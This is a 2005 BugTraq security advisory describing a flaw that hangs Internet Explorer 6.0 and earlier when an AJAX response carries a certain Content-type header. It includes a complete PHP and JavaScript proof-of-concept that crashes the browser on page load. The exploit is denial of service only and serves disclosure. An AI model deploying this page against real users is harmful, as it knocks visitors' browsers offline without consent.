BugTraq
Internet Explorer AJAX Bug Jul 26 2005 04:23PM
anakin php5 pl
Summary:
Internet Explorer 6.0 and below hangs when entering prepared page

Details:
When using AJAX (Asynchronous JavaScript and XML) to load page content dynamicly we are allowed to do anything on the side of server. Internet Explorer process hangs when Content-type header is sent within.

Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.

Patches/Workarounds:
Unknown.

Exploits:
Execute the following PHP script in IE to cause it's process to die.

<?php

if (@$_SERVER['QUERY_STRING'] == 'ajax') {
/**
Sending this header causes Internet Explorer to hang.
*/
header('Content-type: text/html; encoding=utf-8');
echo "\n";
exit;
}

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
<title></title>
<script type="text/javascript">

function pageLoad() {

xmlHttp = false;
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
xmlHttp = false;
}
}
if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
xmlHttp = new XMLHttpRequest();
if (!xmlHttp)
return;
xmlHttp.open("GET", "?ajax", true);
xmlHttp.send(null);
}

</script>
</head>
<body onload="pageLoad()">
</body>
</html>

Discovered by
Łukasz Lach
anakin[at]php5[dot]pl

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus